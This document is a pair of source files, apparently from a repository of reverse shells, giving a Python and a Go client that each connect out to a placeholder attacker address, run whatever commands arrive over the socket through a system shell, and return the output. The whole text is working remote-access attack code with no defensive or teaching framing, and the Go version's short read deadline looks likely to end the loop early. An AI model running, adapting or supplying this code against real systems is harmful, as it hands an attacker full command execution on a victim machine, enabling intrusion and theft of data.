File: Clasic_Rever_Shell/Python/Clasic2.py
# windows (Linux/macOS)
import socket
import sys
import subprocess
import threading
import time

LHOST = "IP_ADDRESS"
LPORT = 9001

def main():
    try:
        # Create TCP socket and connect
        tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_client.connect((LHOST, LPORT))
        
        # Set socket to non-blocking to check for data availability
        tcp_client.setblocking(False)
        
        code = ""
        buffer_size = 1024
        
        while True:
            try:
                # Check if data is available
                ready_to_read, _, _ = select.select([tcp_client], [], [], 0.1)
                
                if ready_to_read:
                    # Read available data
                    data = tcp_client.recv(buffer_size)
                    if data:
                        # Decode the received data
                        received_code = data.decode('utf-8')
                        code += received_code
                        
                        # Check if we have a complete command (ends with newline)
                        if '\n' in received_code:
                            # Execute the command
                            if code.strip():
                                try:
                                    # Execute the command using subprocess
                                    output = subprocess.check_output(
                                        code.strip(),
                                        shell=True,
                                        stderr=subprocess.STDOUT,
                                        universal_newlines=True
                                    )
                                except subprocess.CalledProcessError as e:
                                    output = e.output
                                except Exception as e:
                                    output = str(e)
                                
                                # Send output back
                                tcp_client.sendall((output + "\n").encode('utf-8'))
                                code = ""
                
                # Check if connection is still alive
                tcp_client.send(b'')  # Try to send empty data to check connection
                
            except (socket.error, OSError):
                # Connection lost
                break
            except Exception as e:
                # Handle other exceptions
                try:
                    error_msg = f"Error: {str(e)}\n"
                    tcp_client.sendall(error_msg.encode('utf-8'))
                except:
                    break
                
            time.sleep(0.1)
    
    except Exception as e:
        print(f"Connection error: {e}")
    finally:
        # Clean up
        try:
            tcp_client.close()
        except:
            pass

if __name__ == "__main__":
    # Import select module
    import select
    main()

File: Clasic_Rever_Shell/Go/Clasic2.go
// Linux/macOS
package main

import (
    "fmt"
    "net"
    "os/exec"
    "strings"
    "time"
)

const (
    LHOST = "IP_ADDRESS"
    LPORT = 443
)

func main() {
    // Create TCP socket and connect
    tcpClient, err := net.Dial("tcp", fmt.Sprintf("%s:%d", LHOST, LPORT))
    if err != nil {
        fmt.Printf("Connection error: %v", err)
        return
    }
    defer tcpClient.Close()

    // Set socket to non-blocking to check for data availability
    tcpClient.SetDeadline(time.Now().Add(100 * time.Millisecond))

    var code string
    bufferSize := 1024

    for {
        // Check if data is available
        tcpClient.SetDeadline(time.Now().Add(100 * time.Millisecond))
        data := make([]byte, bufferSize)
        n, err := tcpClient.Read(data)
        if err != nil {
            break
        }

        if n > 0 {
            // Decode the received data
            receivedCode := string(data[:n])
            code += receivedCode

            // Check if we have a complete command (ends with newline)
            if strings.Contains(receivedCode, "\n") {
                // Execute the command
                if strings.TrimSpace(code) != "" {
                    output, err := exec.Command("sh", "-c", code).CombinedOutput()
                    if err != nil {
                        output = []byte(err.Error())
                    }
                    _, err = tcpClient.Write(append(output, '\n'))
                    if err != nil {
                        break
                    }
                    code = ""
                }
            }
        }

        // Check if connection is still alive
        _, err = tcpClient.Write([]byte{})
        if err != nil {
            break
        }

        time.Sleep(100 * time.Millisecond)
    }
}
